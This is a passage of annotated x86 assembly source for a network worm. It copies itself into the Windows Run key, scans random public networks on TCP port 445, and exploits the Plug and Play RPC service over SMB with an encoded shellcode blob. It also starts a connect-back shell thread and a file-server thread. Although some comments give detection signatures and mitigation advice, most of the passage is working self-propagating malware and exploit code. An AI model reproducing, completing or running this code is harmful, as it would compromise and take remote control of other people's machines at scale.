  323.     DB     0xE1, 0x1A, 0xF9, 0xD2, 0x4B, 0xA3, 0x7F, 0x2D, 0xE1, 0x1A, 0xF5
  324.  
  325. shellcode_LEN       EQU ($-shellcode)
  326.  
  327.  
  328.  
  329.  
  330.  
  331. section .text execute
  332. GLOBAL _entry
  333.  
  334.  
  ;-----------------------------------------------------------------------
  ; _entry  -  process entry point (linked with /entry:entry, no CRT).
  ; Sequence visible here:
  ;   1. Single-instance guard: CreateMutex(NULL, TRUE, "Hiberium"); if
  ;      GetLastError() == ERROR_ALREADY_EXISTS the process exits. The mutex
  ;      name is a host indicator for this sample.
  ;   2. WSAStartup(2, WSADATA); OSVERSION = GetVersion(); initialise
  ;      CS_LOOP and CS_THREADNUM; THREADNUM = 0; MTX_CBACK = unnamed mutex.
  ;   3. Persistence: RegOpenKeyEx(HKLM, szStartupKey, 0, KEY_WRITE) and
  ;      RegSetValueEx(hKey, "MSPRO32", REG_SZ, "\"<own module path>\"").
  ;      If the key cannot be opened the step is skipped silently.
  ;   4. CreateThread(@FileServer) - target outside this view.
  ;   5. Main loop: poll InternetGetConnectedState every TIMEOUT ms; once
  ;      connected run @InitShellcode and @Download (the latter outside this
  ;      view), collect local IPs, start a batch of @Scan threads (each given
  ;      one local IP, or 0 once they are used up) plus one @Cback thread,
  ;      then poll until the link drops, clear CONNECTED and start over.
  ; Stack: ebp = entry esp; [ebp-4] = pointer to WSADATA, which is reused as
  ; scratch for the quoted module path and as the lpThreadId out-slot.
  ; Never returns.
  ;-----------------------------------------------------------------------
  335. _entry:
  336.     mov ebp, esp
  337.     push szMutexName
  338.     push 1              ;bInitialOwner = TRUE
  339.     push 0              ;lpMutexAttributes = NULL
  340.     call CreateMutex
  341.     call GetLastError
  342.     cmp eax, ERROR_ALREADY_EXISTS
  343.     jne .1st
  344.  
  ; another instance already owns the named mutex -> leave quietly
  345.     push 0
  346.     call ExitProcess
  347.  
  348. .1st
  349.     mov esi, WSADATA
  350.     push esi        ;[ebp - 4]  (kept on the stack; read back below)
  351.     push esi        ;lpWSAData
  352.     push byte 2     ;wVersionRequested = 2.0
  353.     call WSAStartup
  354.  
  355.     call GetVersion
  356.     mov [OSVERSION], eax
  357.  
  358.     push CS_LOOP
  359.     call InitializeCriticalSection
  360.     push CS_THREADNUM
  361.     call InitializeCriticalSection
  362.  
  363.     xor eax, eax
  364.     mov [THREADNUM], eax
  365.     push eax        ;hKey out-slot for RegOpenKeyEx
  366.  
  ; RegOpenKeyEx arguments (pushed right-to-left); the CreateMutex call in
  ; between is stdcall and cleans its own three arguments, so they stay intact
  367.     push esp        ;phkResult
  368.     push KEY_WRITE
  369.     push eax        ;ulOptions = 0
  370.     push szStartupKey
  371.     push HKEY_LOCAL_MACHINE
  372.  
  373.     push eax
  374.     push eax
  375.     push eax
  376.     call CreateMutex    ;CreateMutex(NULL, FALSE, NULL): unnamed
  377.     mov [MTX_CBACK], eax
  378.  
  379.     call RegOpenKeyEx
  380.     pop ebx         ;ebx = hKey
  381.     or eax, eax
  382.     jnz .reg1       ;could not open the Run key -> skip persistence
  383.  
  ; Build "\"<module path>\"" in the WSADATA scratch buffer: opening quote at
  ; [esi], GetModuleFileName writes from [esi+1], closing quote + NUL appended.
  384.     mov esi, [ebp - 4]
  385.     mov BYTE [esi], '"'
  386.     push esi        ;saved for RegSetValueEx below
  387.     push esi        ;lstrlen
  388.     inc esi
  389.  
  390.     push WSADATA_LEN-1
  391.     push esi
  392.     push eax        ;hModule = NULL (this image)
  393.     call GetModuleFileName
  394.     call lstrlen    ;eax = length incl. the leading quote
  395.     pop esi
  396.     mov BYTE [esi + eax], '"'
  397.     inc eax
  398.     mov BYTE [esi + eax], 0
  398.     inc eax         ;eax = cbData incl. NUL
  399.  
  ; RegSetValueEx(hKey, "MSPRO32", 0, REG_SZ, quotedPath, cbData)
  401.     push eax
  402.     push esi
  403.     push REG_SZ
  404.     push 0
  405.     push szStartupValue
  406.     push ebx
  407.     call RegSetValueEx
  408.  
  409.     push ebx
  410.     call RegCloseKey
  411.  
  412. .reg1
  413.     xor eax, eax
  414.     push eax        ;lpThreadId out-slot
  415.  
  ; CreateThread(NULL, 0, @FileServer, NULL, 0, &threadId); handle dropped
  416.     push esp
  417.     push eax
  418.     push eax
  419.     push @FileServer
  420.     push eax
  421.     push eax
  422.     call CreateThread
  423.     push eax
  424.     call CloseHandle
  425.  
  426.  
  427.  
  428. .NotConn                ;Primary Thread loop
  429.     push dword TIMEOUT
  430.     call Sleep
  431.  
  432.     push 0          ;lpdwFlags slot (and dwReserved via the value 0)
  433.     push esp
  434.     call InternetGetConnectedState
  435.     or eax, eax
  436.     jz .NotConn     ;not online yet -> keep polling
  437.  
  438.     mov [CONNECTED], eax        ;TRUE
  439.  
  440.     call @InitShellcode
  441.     call @Download
  442.  
  ; @GetLocalIPs(edi = lpLocalIPs, ecx = SCAN_THREADS); lpLocalIPs is pushed
  ; so it can be reloaded into esi after the call (edi advances inside)
  443.     push byte SCAN_THREADS
  444.     pop ecx
  445.     mov edi, lpLocalIPs
  446.     push edi
  447.     call @GetLocalIPs
  448.  
  ; Batch size from OSVERSION bit 31 (set on non-NT platforms):
  ;   bit 31 clear -> eax = -1 -> ecx = (SCAN_THREADS-1) + 2 = SCAN_THREADS+1
  ;   bit 31 set   -> eax =  0 -> ecx = 2
  ; The loop below creates ecx threads, the last one being @Cback, i.e.
  ; SCAN_THREADS (or 1) @Scan threads plus one @Cback thread.
  449.     mov eax, [OSVERSION]
  450.     or eax, eax
  451.     sets al
  452.     movzx eax, al
  453.     dec eax
  454.  
  455.     push SCAN_THREADS -1
  456.     pop ecx
  457.     AND ecx, eax
  458.     inc ecx
  459.     inc ecx
  460.  
  461.     pop esi         ;esi = lpLocalIPs
  462.     mov edi, [dwLocalIPs]   ;edi = local IPs still to hand out
  463.  
  464. .CreateScanThreads
  465.     push ecx
  466.  
  467.     xor edx, edx
  468.     push WSADATA        ;lpThreadID
  469.     push edx        ;dwCreationFlags
  470.     xor eax, eax
  471.     or edi, edi
  472.     jz .Nip         ;no local IP left -> parameter 0 (random nets)
  473.  
  474.     lodsd           ;eax = next local IP
  475.     dec edi
  476. .Nip
  477.     push eax        ;lpParameter (local IPs)
  478.     push @Scan      ;lpStartRoutine
  479.     dec ecx
  480.     jnz .scan
  481.  
  ; last iteration: replace the start routine with @Cback
  482. .cback
  483.     pop eax
  484.     push @Cback     ;Cback shell thread
  485. .scan
  486.     push edx        ;dwStackSize = 0
  487.     push edx        ;lpThreadAttributes = NULL
  488.     call CreateThread
  489.     push eax
  490.     call CloseHandle
  491.     pop ecx
  492.     loop .CreateScanThreads
  493.  
  ; online: poll until the link goes away
  494. .Conn
  495.     push dword TIMEOUT
  496.     call Sleep
  497.  
  498.     push 0
  499.     push esp
  500.     call InternetGetConnectedState
  501.     or eax, eax
  502.     jnz .Conn
  503.  
  504.     mov [CONNECTED], eax        ;FALSE  (scanner threads exit on this)
  505.     jmp .NotConn
  506.  
  507.  
  508.  
  ;-----------------------------------------------------------------------
  ; @InitShellcode  -  determine a local IPv4 address and store it, XORed
  ; with SHELLCODE_XORIP, into the writable `shellcode` buffer at offset
  ; SHELLCODE_IP (the decoder stub in the blob undoes the XOR at run time).
  ; Method: a UDP socket is connect()ed to a fixed literal sockaddr (on a
  ; datagram socket connect only records the peer, no packet is sent) and
  ; getsockname() is read back - presumably to learn the address of the
  ; outbound interface. If getsockname() fails, falls back to
  ; gethostname()/gethostbyname() and takes the first h_addr_list entry.
  ; The WSADATA buffer is used as scratch for the host name.
  ; Frame: ebp-based; the sockaddr lives on the stack. ebx = socket.
  ; Clobbers eax, ebx, edx, esi, flags.
  ;-----------------------------------------------------------------------
  509. @InitShellcode:
  510.     push ebp
  511.     mov ebp, esp
  512.  
  513.     xor eax, eax
  514.     push eax        ;sin_zero
  515.     push eax
  516.  
  517.     push byte IPPROTO_UDP
  518.     push byte SOCK_DGRAM
  519.     push byte 2     ;AF_INET
  520.     call socket
  521.     xchg ebx, eax   ;ebx = socket
  522.  
  ; sockaddr_in as two literal dwords: {sin_addr}, then {sin_family=2, sin_port}
  523.     push 0xBECF3752
  524.     push 0x11220002
  525.  
  526.     mov edx, esp    ;edx = &sockaddr
  527.     push 0x10
  528.     push edx
  529.     push ebx
  530.     call connect
  531.  
  ; getsockname(ebx, &sockaddr, &namelen) overwrites the sockaddr in place
  532.     mov edx, esp
  533.     push 0x10
  534.     push esp        ;&namelen
  535.     push edx
  536.     push ebx
  537.     call getsockname
  538.  
  539.     mov edx, [esp + 8]
  540.     push ebx        ;argument for closesocket at the end
  541.     or eax, eax
  542.     jz .1           ;getsockname() succeeded
  543.  
  ; fallback: gethostbyname(gethostname())
  544.     mov esi, WSADATA
  545.     push esi        ;gethostbyname
  546.  
  547.     push WSADATA_LEN
  548.     push esi
  549.     call gethostname
  550.     call gethostbyname
  551.  
  552.     or eax, eax
  553.     jz .1           ;lookup failed: keep edx as is
  554.     mov esi, [eax + 12] ;hostent.h_addr_list
  555.     lodsd           ;eax = pointer to first in_addr (NULL-terminated list)
  556.     or eax, eax
  557.     jz .1
  558.     mov edx, [eax]  ;edx = first address
  559.  
  560. .1
  561. ;SHELLCODE IP
  ; pre-XOR so the decoder stub yields the clear address
  562.     xor edx, SHELLCODE_XORIP
  563.     mov DWORD [shellcode + SHELLCODE_IP], edx
  564.     call closesocket
  565.  
  566.     leave
  567.     ret
  568.  
  569.  
  570. ;ARGS:  edi = DWORD array
  571. ;   ecx = array items
  ;-----------------------------------------------------------------------
  ; @GetLocalIPs  -  fill edi[] with up to ecx non-loopback IPv4 addresses of
  ; this host, taken from gethostbyname(NULL)->h_addr_list; addresses whose
  ; first octet is 127 are skipped without consuming a slot. The number of
  ; addresses stored is written to dwLocalIPs (0 if the lookup fails).
  ; Clobbers eax, ebx, ecx, esi, edi, flags.
  ;-----------------------------------------------------------------------
  572. @GetLocalIPs:
  573.  
  574.     push ecx
  575.     push byte 0     ;name = NULL -> local host
  576.     call gethostbyname
  577.  
  578.     pop ecx
  579.  
  580.     xor ebx, ebx    ;ebx = stored count
  581.     or eax, eax
  582.     jz .end
  583.  
  584.     mov esi, [eax + 12]     ;h_addr_list
  585.  
  586. .1
  587.     lodsd           ;eax = next in_addr pointer, NULL ends the list
  588.     or eax, eax
  589.     jz .end
  590.  
  591.     mov eax, [eax]
  592.     cmp al, 127     ;first octet (network byte order) == 127 -> loopback
  593.     jnz .2
  594.  
  595.     inc ecx         ;undo the loop decrement: loopback does not use a slot
  596.     jmp short .l1
  597.  
  598. .2
  599.     stosd
  600.     inc ebx
  601. .l1
  602.     loop .1
  603.  
  604. .end
  605.     mov [dwLocalIPs], ebx
  606.  
  607. .ret
  608.     ret
  609.  
  610.  
  611.  
  612.  
  613. ;ARG1:  IP address or 0
  614. ;
  ;-----------------------------------------------------------------------
  ; @Scan  -  scanner thread (created by _entry).
  ; ARG1 ([ebp+4]) = local IPv4 address whose /24 is scanned first, or 0 to
  ; start from a random network (@GetRandomNet).
  ; Behaviour - the network signature to detect: bursts of up to 64
  ; non-blocking TCP connect()s to port 445, one per consecutive host of a
  ; /24 (hosts .1-.254), then Sleep(TIMEOUT) and a single select() on the
  ; write set; each writable (connected) socket is passed to @PortOpen, then
  ; all sockets are closed via @CloseSockArr. After a burst the net advances
  ; sequentially (next third octet, then second) as long as the previous
  ; burst produced connections; otherwise a new random net is drawn.
  ; Locals (ebp-relative %xdefines below): _445OPEN = connect count, later
  ; the select() result; SIN = sockaddr_in {AF_INET, htons(445), IP};
  ; IP_2..IP_4 = octets 2..4 of IP; RAND_SEED = PRNG state used by
  ; @randinit/@rand/@GetRandomNet. LOCAL_DATA_SIZE bytes in total; esp is
  ; reset from ebp after every burst.
  ; Throttling: @sleep between socket calls; on platforms where OSVERSION
  ; bit 31 is set an extra 40 s / 240 s pause per burst.
  ; Exits via ExitThread when CONNECTED becomes 0. Never returns.
  ;-----------------------------------------------------------------------
  615. @Scan:
  616.     mov ebp, esp
  617.     xor ebx, ebx
  618.  
  619.     push ebx
  620.     push ebx
  621.                 %xdefine     _445OPEN   [ebp - 0x4]
  622.                 %xdefine     NUM_IPDUP  [ebp - 0x8]
  623.     push ebx
  624.     push ebx    ;sin.zero
  625.     push ebx    ;ip
  626.  
  627.                 %xdefine     IP_4   [ebp - 0x11]    ;class D
  628.                 %xdefine     IP_3   [ebp - 0x12]    ;class C
  629.                 %xdefine     IP_2   [ebp - 0x13]    ;class B
  630.                 %xdefine     IP [ebp - 0x14]
  631.  
  632.  
  ; sin_family = AF_INET (2) | (htons(445) << 16): the port is byte-swapped
  ; by hand because the constant is built at assembly time
  633.     push dword (2 | ((((445 << 8) & 0xFF00) | ((445 >> 8) & 0xFF)) << 16)  )
  634.  
  635.                 %xdefine     SIN    [ebp - 0x18]
  636.  
  637.     sub esp, 0x10
  638.                 %xdefine     RAND_SEED  [ebp - 0x1C]
  639.                 LOCAL_DATA_SIZE  EQU    (0x18 + 0x10)
  640.  
  641.     call @randinit
  642.     mov eax, [ebp + 4]
  643.     or eax, eax
  644.     jz @Net_loop    ;no start address -> random net
  645.  
  646.     mov IP, eax
  647.     jmp short @sock_arr
  648.  
  ; pick the next /24: sequential if the last burst had open ports, else random
  649. @Net_loop
  650.     mov byte IP_4, 0
  651.  
  652.     cmp dword _445OPEN, byte 0
  653.     jnle .c
  654. .r
  655.     call @GetRandomNet
  656.     mov IP, ebx
  657.     jmp short @sock_arr
  658. .c
  659.     inc byte IP_3       ; inc class C net
  660.     jnz @sock_arr
  661.     inc byte IP_2       ; inc class B
  662.     jz .r           ;wrapped all the way -> random
  663.  
  ; one burst: up to 64 non-blocking connects, sockets kept on the stack
  664. @sock_arr
  665.     xor ecx, ecx
  666.     mov cl, 64
  667.  
  668. @sock_loop
  669.     inc byte IP_4
  670.     cmp byte IP_4, 0xFF
  671.     je @Select      ;host .255 reached -> evaluate what we have
  672.     push ecx            ; counter
  673.  
  674.         push byte 0
  675.         push byte 1     ;SOCK_STREAM
  676.         push byte 2     ;AF_INET
  677.         call socket
  678.         mov ebx, eax
  679.         push esp            ; ecx = TRUE  (argp -> the saved counter, nonzero)
  680.         push FIONBIO
  681.         push ebx
  682.         call ioctlsocket    ;non-blocking, so connect() returns at once
  683.  
  684.         push byte 0x10
  685.         lea eax, SIN
  686.         push eax
  687.         push ebx
  688.         call connect
  689.         call @sleep
  690.  
  691.     pop ecx
  692.     push ebx        ;save sockets on stack
  693.     loop @sock_loop
  694.  
  ; ch = number of sockets created (64 - remaining counter)
  695. @Select
  696.     mov ch, 64
  697.     sub ch, cl
  698.     jz @end_loop        ; (<- should never happen)
  699.     movzx ecx, ch
  700.     mov esi, esp
  701.     mov ebx, esp        ; socket array
  702.     mov _445OPEN, ecx
  703.  
  ; build an fd_set on the stack: fd_array[] first, then fd_count on top
  704. .fd_set
  705.     lodsd
  706.     push eax        ; fd_array
  707.     call @sleep
  708.     loop .fd_set
  709.  
  710.     mov edx, _445OPEN
  711.     push edx        ; fd_count
  712.     mov esi, esp    ;esi = &fd_set (writefds)
  713.  
  714.     push edx        ; CloseSockArr (sock count <= 64)
  715.     push ebx        ; CloseSockArr (pointer to socket array)
  716.  
  ; select(0, NULL, &fd_set, NULL, &tv{0,0}) after a TIMEOUT wait (ecx is 0 here)
  717.     push ecx
  718.     push ecx
  719.     push esp        ; tv { 0,0 } poll
  720.     push ecx        ; exceptfds
  721.     push esi        ; writefds
  722.     push ecx        ; readfds
  723.     push ecx
  724.     push dword TIMEOUT  ; 5 sec.
  725.     call Sleep
  726.     call select
  727.     add esp, byte 8 ;drop tv
  728.     mov _445OPEN, eax   ;number of writable sockets, 0 or SOCKET_ERROR
  729.  
  730.     or eax, eax
  731.     jle @select_end     ; 0 | -1
  732.  
  ; select() rewrote fd_count with the ready count and compacted fd_array
  733.     lodsd           ; fd_count
  734.     mov ecx, eax
  735.  
  736. .open_loop
  737.     lodsd           ; fd_array
  738.     call @PortOpen  ;eax = connected socket
  739.     call @sleep
  740.     loop .open_loop
  741.  
  742. @select_end
  743.     call @CloseSockArr      ; ebx, edx
  744. @end_loop
  745.  
  ; discard everything pushed during the burst
  746.     mov esp, ebp
  747.     sub esp, LOCAL_DATA_SIZE
  748.  
  749.     cmp DWORD [CONNECTED], 0
  750.     je .Exit_Scan           ; disconnected
  751.  
  752.     mov eax, [OSVERSION]
  753.     or eax, eax
  754.     jns .2          ;NT: no extra pause
  755.  
  756.     ;only for Win9x
  757.     cmp dword _445OPEN, byte 0
  758.  
  759.     jle .40
  760.     jmp short .240
  761.  
  762. .40
  763.     push dword 40 * 1000        ;40 sec.
  764.     jmp short .sleep
  765. .240
  766.     push dword 240 * 1000       ;4 min. (TIME_WAIT delay)
  767.  
  768. .sleep
  769.     call Sleep
  770.  
  ; same net until host .255, then the next net
  771. .2
  772.     cmp byte IP_4, 0xFF
  773.     je  @Net_loop
  774.     jmp @sock_arr
  775.  
  776. .Exit_Scan
  777.     call ExitThread
  778.  
  779.  
  780.  
  ;-----------------------------------------------------------------------
  ; @randinit  -  seed RAND_SEED ([ebp-0x1C] in @Scan's frame; must be called
  ; with ebp = that frame) from GetCurrentThreadId() and GetTickCount(),
  ; mixed with mul/rol. Non-cryptographic; only used to pick scan targets.
  ; Clobbers eax, ecx, edx, flags.
  ;-----------------------------------------------------------------------
  781. @randinit:
  782.     call GetCurrentThreadId
  783.     mul ah          ;ax = al * ah
  784.     xchg al, ah
  785.     mul ax          ;dx:ax = ax * ax
  786.     shl eax, 16
  787.     mov ax, dx
  788.     push eax
  789.     call GetTickCount
  790.     pop ecx
  791.     mul ecx         ;edx:eax = tick * mixed thread id
  792.     rol eax, cl
  793.     mov RAND_SEED, eax
  794.     ret
  795.  
  796.  
  ;-----------------------------------------------------------------------
  ; @sleep  -  process-wide pacing: Sleep(1) while holding CS_LOOP, so all
  ; threads calling it are serialised through a 1 ms window (roughly one
  ; socket operation per millisecond across the process). Preserves ecx;
  ; eax and edx are clobbered by the API calls.
  ;-----------------------------------------------------------------------
  797. @sleep:
  798.     push ecx
  799.     push CS_LOOP
  800.     call EnterCriticalSection
  801.         push byte 1
  802.         call Sleep
  803.     push CS_LOOP
  804.     call LeaveCriticalSection
  805.     pop ecx
  806.     ret
  807.  
  808.  
  ;-----------------------------------------------------------------------
  ; @CloseSockArr  -  closesocket() every entry of a SOCKET array, last entry
  ; first, with @sleep between calls. Stack arguments, stdcall-style (ret 8):
  ;   [esp+4] = SOCKET array, [esp+8] = count; count must be >= 1 (the first
  ;   index used is count-1, and the loop counter trick below needs it).
  ; Clobbers eax, ebx, ecx, edx, flags.
  ;-----------------------------------------------------------------------
  809. @CloseSockArr:
  810.     mov ebx, [esp + 4]  ; socket array
  811.     mov ecx, [esp + 8]  ; count
  812.  
  813. .close_loop:
  814.  
  ; ecx doubles as loop counter and (after dec) as the index; the inc/pop
  ; restore it so that `loop` steps it down by exactly one per iteration
  815.     dec ecx
  816.     push ecx
  817.  
  818.     push dword [ebx + ecx * 4]
  819.     call closesocket
  820.     call @sleep
  821.  
  822.     pop ecx
  823.     inc ecx
  824.     loop .close_loop
  825.  
  826.     ret 8
  827.  
  828.  
  ;-----------------------------------------------------------------------
  ; @PortOpen  -  called for each socket that select() reported writable
  ; (i.e. a TCP/445 connect succeeded). getpeername() fetches the peer
  ; sockaddr into a 16-byte stack buffer; on success one dword of it is taken
  ; as the peer address, looked up in lpLocalIPs (dwLocalIPs entries) so the
  ; host does not target itself, and if absent an @AttackPnP thread is
  ; created for it with a STACK_SIZE stack. @WaitMaxThreads (outside this
  ; view; presumably enforces MAX_THREADS) runs on every path.
  ; In: eax = socket. Preserves ecx, esi; clobbers eax, edx, edi, flags.
  ;-----------------------------------------------------------------------
  829. @PortOpen:      ; eax: socket
  830.     push ecx
  831.     push esi
  832.  
  833.     sub esp, byte 0x10  ; 0x10 bytes stack frame
  834.     mov edx, esp
  835.     push byte 0x10
  836.     push esp        ; len
  837.     push edx        ; sockaddr
  838.     push eax
  839.     call getpeername
  840.  
  841.     add esp, byte 8
  842.     or eax, eax     ;getpeername() result (pop below does not touch flags)
  843.     pop eax         ;eax = address dword taken from the sockaddr buffer
  844.     jnz .end        ;getpeername() failed
  845.  
  ; skip our own addresses: repne scasd leaves ZF set on a match
  846.     mov ecx, [dwLocalIPs]
  847.     mov edi, lpLocalIPs
  848.     repne scasd
  849.     je .end
  850.  
  ; CreateThread(NULL, STACK_SIZE, @AttackPnP, ip, 0, &id); ecx is 0 here
  851.     push esp    ;lpThreadId
  852.     push ecx    ;dwCreationFlags
  853.     push eax    ;lpParameter (IP)
  854.     push @AttackPnP
  855.     push STACK_SIZE
  856.     push ecx
  857.     call CreateThread
  858.     push eax
  859.     call CloseHandle
  860.  
  861. .end
  862.     call @WaitMaxThreads
  863.     add esp, byte 0x8
  864.     pop esi
  865.     pop ecx
  866.     ret
  867.  
  868.  
  ;-----------------------------------------------------------------------
  ; @rand  -  pseudo-random number: returns eax in [0, ecx).
  ; In:  ecx = modulus (> 0), preserved. Reads/updates RAND_SEED, which is an
  ;      ebp-relative slot of @Scan's frame, so ebp must be that frame.
  ;      GetTickCount() is mixed in on every call.
  ; Out: eax = result, edx = quotient (clobbered). Non-cryptographic mixer.
  ;-----------------------------------------------------------------------
  869. @rand:
  870.  push ecx
  871.  mov eax, RAND_SEED
  872.  mov cl, al
  873.  rol eax, cl    ; rotate left, bits shifted out reenter on the right
  874.  push eax
  875.  push ecx       ; ecx is caller-saved across the API call
  876.  call GetTickCount
  877.  mov cl, al
  878.  ror eax, cl
  879.  pop ecx
  880.  rol eax, cl
  881.  pop edx
  882.  add edx, eax       ;add some big number
  883.  mov eax, edx
  884.  mov ecx, eax
  885.  mul ecx            ; edx:eax = eax^2
  886.  mov cl, al
  887.  rol eax, cl
  888.  xor eax, edx
  889.  mov RAND_SEED, eax ; store random seed
  890.  
  891.  pop ecx            ; ecx = modulus again
  892.  xor edx, edx       ; zero edx for edx:eax MOD ecx
  893.  div ecx        ; divide by ecx, remainder in edx
  894.  xchg eax, edx
  895.  
  896.  ret
  897.  
  898.  
  899. ;RETURN:    ebx
  900. ;
  ;-----------------------------------------------------------------------
  ; @GetRandomNet  -  draw a random IPv4 /24 prefix.
  ; Out: ebx = octets 1..3 in network byte order (4th octet 0). Each octet
  ;      comes from @rand with modulus 256; the accumulated value is re-drawn
  ;      while the first octet is 0, 10, 127 or > 223, or the prefix falls in
  ;      172.16-31.x or 192.168.x (private, loopback, multicast ranges).
  ; Requires ebp = @Scan's frame (RAND_SEED via @rand). Clobbers eax, ecx,
  ; edx, flags.
  ;-----------------------------------------------------------------------
  901. @GetRandomNet:
  902.     xor ebx, ebx
  903.  
  904.     push byte 3
  905.     pop ecx         ;three octets to draw
  906.  
  907. .rnd
  908.     push ecx
  909.     mov cx, 256     ;modulus (high word of ecx is 0 here)
  910.     call @rand
  911.  
  ; shift the octet into position: ecx=3 -> bits 0-7, 2 -> 8-15, 1 -> 16-23
  912.     pop ecx
  913.     push ecx
  914.     sub ecx, byte 3
  915.     neg ecx
  916.     imul ecx, byte 8
  917.     shl eax, cl
  918.     pop ecx
  919.     or eax, ebx     ;eax = prefix so far incl. the new octet
  920.  
  921.     cmp al, 0
  922.     je .rnd
  923.     cmp al, 10
  924.     je .rnd
  925.     cmp al, 127
  926.     je .rnd
  927.     cmp al, 223
  928.     ja .rnd
  929.  
  930.     cmp al, 172
  931.     jne .b
  932.     cmp ah, 16
  933.     jb .b
  934.     cmp ah, 31
  935.     jbe .rnd
  936. .b
  937.     cmp al, 192
  938.     jne .next
  939.     cmp ah, 168
  940.     je  .rnd
  941.  
  942. .next:
  943.     or ebx, eax
  944.     loop .rnd
   945.    
  946.     ret
  947.    
  948.  
  949.  
;-----------------------------------------------------------------------
; @AttackPnP - per-target thread: SMB session to TCP/445, then one RPC
;              request over the \browser pipe carrying `shellcode`
; ARG1:  ip address   ([ebp + 4] = the CreateThread lpParameter, in_addr)
; Frame: ebp = esp on entry (no `push ebp`: the thread never returns, it
;        finishes with ExitThread).  Two 4 KiB locals, see the EQUs below.
; Regs:  ebx = socket for the whole routine, except around the tree-connect
;        build where it is the packet cursor and the socket sits on the
;        stack; edi = receive buffer / memcpy destination.
; Flow:  each step bails out to .cs (closesocket) when send() returns -1,
;        when @arecv yields 10 bytes or fewer, or when byte 9 of the
;        reply is non-zero.  Offset 9 lies in the SMB header just after
;        the command byte (assuming the usual 4-byte NetBIOS session
;        prefix), so this looks like a "status == 0" test - confirm
;        against the SMB header layout.
; Defender notes: the exchange is Negotiate, SessionSetupAndX (twice),
;        TreeConnectAndX to the share named by STR_IPC (presumably IPC$),
;        a \browser pipe open, a bind to the PNP endpoint, and finally a
;        single 2196-byte request padded with 0x90.  All message templates
;        (SMB_*, RPC_call*, shellcode) are defined outside this view.  The
;        fixed request size and the pipe/endpoint sequence are the
;        properties that network signatures for this family key on;
;        filtering TCP/445 at network boundaries and patching the
;        targeted service remove the exposure.
;-----------------------------------------------------------------------
@AttackPnP:
    mov ebp, esp
    sub esp, 8196           ; _recvbuf (4100) + _packet (4096)

_recvbuf    EQU     4100    ;[ebp - 4100]
_recvbuf_LEN    EQU     4096
_packet     EQU     8196    ;[ebp - 8196]
_packet_LEN EQU     4096



    call @WaitMaxThreads    ; throttle while THREADNUM > MAX_THREADS
    push byte 1
    call @AddThreadNum  ;inc THREADNUM
;int3
    xor eax, eax
    push eax                ; sockaddr_in.sin_zero (8 bytes)
    push eax
    push DWORD [ebp + 4]    ;IP address  -> sin_addr
    push DWORD (2 | ((((445 << 8)&0xFF00) | ((445 >> 8)&0xFF)) << 16) )   ; sin_family = AF_INET, sin_port = htons(445)

    push eax                ; protocol 0
    push 1                  ; SOCK_STREAM
    push 2                  ; AF_INET
    call socket
    xchg ebx, eax           ; ebx = socket (INVALID_SOCKET is not checked)

    mov edx, esp            ; edx -> the sockaddr_in built above
    push 0x10               ; sizeof(sockaddr_in)
    push edx
    push ebx
    call connect
    or eax, eax
    jnz NEAR .cs            ; connect failed -> close and exit the thread

    push eax                ; send flags = 0 (eax is 0 here)
    push SMB_Negotiate_LEN
    push SMB_Negotiate
    push ebx
    call send
    inc eax
    jz NEAR .cs             ; send returned SOCKET_ERROR (-1)

    lea edi, [ebp - _recvbuf]

    push SMB_RECV_TIMEOUT
    push _recvbuf_LEN
    push edi
    call @arecv             ; @arecv takes the socket in ebx
    cmp eax, 10
    jle NEAR .cs            ; timeout, error or reply too short
    cmp byte [edi + 9], 0   ; reply status byte, see header note
    jne NEAR .cs

    push 0
    push SMB_SessionSetupAndX_LEN
    push SMB_SessionSetupAndX
    push ebx
    call send
    inc eax
    jz NEAR .cs

    push SMB_RECV_TIMEOUT
    push _recvbuf_LEN
    push edi
    call @arecv
    cmp eax, 10
    jle NEAR .cs            ; note: no status-byte check on this reply

    push 0
    push SMB_SessionSetupAndX2_LEN
    push SMB_SessionSetupAndX2
    push ebx
    call send
    inc eax
    jz NEAR .cs

    push SMB_RECV_TIMEOUT
    push _recvbuf_LEN
    push edi
    call @arecv
    cmp eax, 10
    jle NEAR .cs
    cmp byte [edi + 9], 0
    jne NEAR .cs

    push ebx    ;sock       ; saved: ebx is the packet cursor from here to the pop

    push byte SMB_TreeConnectAndX_LEN
    lea ebx, [ebp - _packet]
    lea edi, [ebp - _recvbuf]
    push SMB_TreeConnectAndX
    push ebx
    lea ebx, [ebx + SMB_TreeConnectAndX_LEN]   ; ebx -> where the share path goes
    call memcpy             ; memcpy(_packet, SMB_TreeConnectAndX, LEN); cdecl, cleaned below

    push DWORD [ebp + 4]    ;IP
    call inet_ntoa          ; eax -> dotted-quad string of the target
    push eax
    push STR_IPC            ; format string defined elsewhere (presumably "\\%s\IPC$")
    push edi
    call wsprintf           ; _recvbuf = share path, ASCII

    push edi
    push ebx
    call @convert_name      ; widen the path to 16-bit chars at ebx (no terminator written)

    xor eax, eax
    cld
    or ecx, -1
    add esp, 24             ; drop the 3 + 3 cdecl args of memcpy and wsprintf
    repne scasb     ;edi = _recvbuf   ; ecx = -(strlen + 2)
    not ecx                 ; ecx = strlen + 1
    lea ecx, [ecx + ecx - 2]   ; ecx = 2 * strlen = size of the widened path
    mov eax, ecx
    add ecx, 9              ; length field value: widened path + 9 (presumably the fixed bytes that follow it)
    AND eax, 0xFFFF
    add ebx, eax            ; ebx -> just past the widened path

    lea edx, [ebx + SMB_TreeConnectAndX__LEN]   ; edx -> end of the packet
    mov [ebp - _packet + SMB_TreeConnectAndX_LEN - 3], cl   ; length byte three bytes before the path (presumably the SMB byte count)

    mov eax, [SMB_TreeConnectAndX_]    ; 8-byte tail template copied after the path
    mov [ebx], eax
    mov eax, [SMB_TreeConnectAndX_ + 4]
    mov [ebx + 4], eax

    pop ebx     ;sock
    lea eax, [ebp - _packet]
    sub edx, eax            ; edx = total packet length
    push 0                  ; send flags
    lea eax, [edx - 4]      ; length minus the 4-byte NetBIOS session header
    push edx
    mov [ebp - _packet + 3], al   ; low byte of the NetBIOS length field (presumably)
    lea eax, [ebp - _packet]
    push eax

    push ebx
    call send
    inc eax
    jz NEAR .cs


    lea edi, [ebp - _recvbuf]

    push SMB_RECV_TIMEOUT
    push _recvbuf_LEN
    push edi
    call @arecv
    cmp eax, 10
    jle NEAR .cs
    cmp byte [edi + 9], 0
    jne NEAR .cs

    push 0
    push SMB_PipeRequest_browser_LEN
    push SMB_PipeRequest_browser
    push ebx
    call send
    inc eax
    jz NEAR .cs

    push SMB_RECV_TIMEOUT
    push _recvbuf_LEN
    push edi
    call @arecv
    cmp eax, 10
    jle NEAR .cs
    cmp byte [edi + 9], 0
    jne NEAR .cs

    push 0
